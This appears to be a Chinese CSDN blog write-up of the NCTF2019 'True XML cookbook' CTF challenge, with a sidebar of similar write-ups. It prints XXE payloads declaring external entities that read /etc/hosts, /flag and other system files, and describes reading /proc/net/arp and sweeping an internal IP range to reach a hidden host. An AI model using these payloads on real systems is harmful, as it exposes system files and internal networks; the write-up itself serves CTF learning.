[NCTF2019]True XML cookbook + XXE攻击内网

最新推荐文章于 2021-10-20 13:13:39 发布
最新推荐文章于 2021-10-20 13:13:39 发布
阅读量595 收藏
点赞数 2
分类专栏: ctf # web 文章标签: xml ctf web XXE
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/120197341
版权
ctf 同时被 2 个专栏收录
85 篇文章 10 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

这题昨天不管我怎么试都报错…可能是buu靶场问题

XXE

XXE除了基本的读文件,还有很多用法,比如探测、攻击内网。能与其他一些漏洞结合起来使用。
读取/etc/hosts/proc/net/arp推得内网存活主机ip


wp

[NCTF2019]True XML cookbook

和Fake XML cookbook差不多,尝试读passwd
在这里插入图片描述
flag不在本机,所以XXE攻击内网

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/hosts">
  ]>
<user><username>&admin;</username><password>123456</password></user>

在这里插入图片描述
读取/etc/hosts/proc/net/arp推得内网存活主机ip为10.0.226.2
在这里插入图片描述
http直接访问没有东西
爆破内网IP:10.0.226.1-10.0.226.255
访问内网机http://10.0.226.6得到flag
在这里插入图片描述

参考链接:http://yulige.top/?p=752#True_XML_cookbook294pt_25solvers

shu天
关注
专栏目录
[NCTF2019]True XML cookbook
missht0的博客
01-30 417
[NCTF2019]True XML cookbook 抓包,发现存在XXE漏洞 添加外部注入实体 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file:///flag"> ]> <user> <username>&admin;</username> <password>password<
BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 1936
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
[NCTF2019]True XML cookbook(xxe技巧)
EC_Carrot的博客
12-21 593
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进到去跟fack那个题目差不多,直接用那里的payload看看 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY abc SYSTEM "file:///flag"> ]> <user><username>&am
xxe漏洞】buu_[NCTF2019]True XML cookbook
serendipity1130的博客
10-09 295
1.打开网页,一个熟悉的界面,抓包发现Content-Type:为application/xml,存在xxe漏洞: 2.读取相关敏感文件proc/net/arp,发现存在一个ip地址: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///proc/net/arp"> ]> <user><username>&exp;&
NO.2-32 [NCTF2019]True XML cookbook
nigo134的博客
08-03 254
抓包一看就知道可能是xxe漏洞,拿个exp直接发过去看看效果。 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///flag"> ]> <user><username>&exp;</username><password>aaaa</password></user> .
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 372
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
【学习笔记 46】 buu [NCTF2019]Fake XML cookbook
weixin_43553654的博客
08-03 384
0x00 知识点 XXE攻击 0x01 知识点详解 什么是XXE攻击? 答: XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 这里有一篇大佬的博客可以学习学习 0x02 解题思路
[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 726
XML基础 XML文件可以分为三部分: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><note category="COOKING"></note></foo> 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
2020/7/07 - [NCTF2019]True XML cookbook - xxe
抒情诗
07-08 701
我准备发两份,一份发到这里,另一份发到CSDN上面,这里的内容浏览器不好搜到,别人看不到,无趣 第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8看看这熟悉的内容,好吧,第一道payload为 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "./flag.txt"> ]> <user><
------已搬运-------xxe入门学习--------BUUCTF:[NCTF2019]Fake(True) XML cookbook---------jarvisoj的API调用
Zero_Adam的博客
02-16 605
目录:一、XML基础知识:二、应用场景:例题:1. buu的[NCTF2019]Fake XML cookbook2. jarvisoj的API调用 一、XML基础知识: 这两个都不错 https://blog.csdn.net/gavin_john/article/details/51532756 https://blog.csdn.net/bylfsj/article/details/101441734 这个就离谱。直接xxe全部学完了,学精通了,,暂时不用看这个,, https://xz.aliyun
[NCTF2019]True XML cookbook 1
qq_53460654的博客
05-30 775
之前写了个fake 这次又来个ture 打开环境 明确是xxe 直接抓包 回显位还是1 试试直接读flag <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;</username> <password>123456</password> &
[NCTF2019]SQLi
最新发布
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值